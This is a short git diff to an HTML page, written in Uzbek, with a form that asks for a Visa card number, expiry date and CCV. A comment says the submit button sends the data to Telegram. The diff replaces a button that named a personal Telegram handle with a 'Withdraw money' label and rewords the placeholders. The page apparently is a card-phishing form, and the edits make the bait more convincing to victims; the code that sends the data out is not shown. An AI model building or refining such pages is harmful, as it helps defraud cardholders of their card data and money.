--- a/index.html
+++ b/index.html
@@ -261,19 +261,19 @@
             <!-- Karta raqami -->
             <div class="input-group">
                 <label><span class="icon">💳</span> Karta raqami (Visa)</label>
-                <input type="text" id="cardNumber" class="input-field" placeholder="8600 1234 5678 9123" maxlength="19" inputmode="numeric" autocomplete="cc-number">
-                <div class="hint-text"><span class="icon">🔒</span> 16 xonali, faqat Visa (4 bilan boshlanadi)</div>
+                <input type="text" id="cardNumber" class="input-field" placeholder="karta raqamini yozing" maxlength="19" inputmode="numeric" autocomplete="cc-number">
+                <div class="hint-text"><span class="icon">🔒</span> faqat visa kartasi kiriting</div>
             </div>
 
             <!-- Amal qilish muddati va CCV yonma-yon -->
             <div class="row-fields">
                 <div class="input-group">
-                    <label><span class="icon">📅</span> Muddat</label>
+                    <label><span class="icon">📅</span> amal qilish muddati</label>
                     <input type="text" id="expiry" class="input-field" placeholder="MM/YY" maxlength="5" inputmode="numeric" autocomplete="cc-exp">
                 </div>
                 <div class="input-group">
                     <label><span class="icon">🔐</span> CCV</label>
-                    <input type="text" id="ccv" class="input-field" placeholder="123" maxlength="4" inputmode="numeric" autocomplete="off">
+                    <input type="text" id="ccv" class="input-field" placeholder="karta orqasida korsatilgan" maxlength="4" inputmode="numeric" autocomplete="off">
                 </div>
             </div>
 
@@ -288,7 +288,7 @@
 
             <!-- Yuborish tugmasi (telegramga yo‘naltirish) -->
             <button type="submit" class="btn-submit" id="submitBtn">
-                <span>✈️</span> Yuborish (@Vlad_admin_ru_uz)
+                <span>💰 </span> Pul yechish
             </button>
         </form>
 
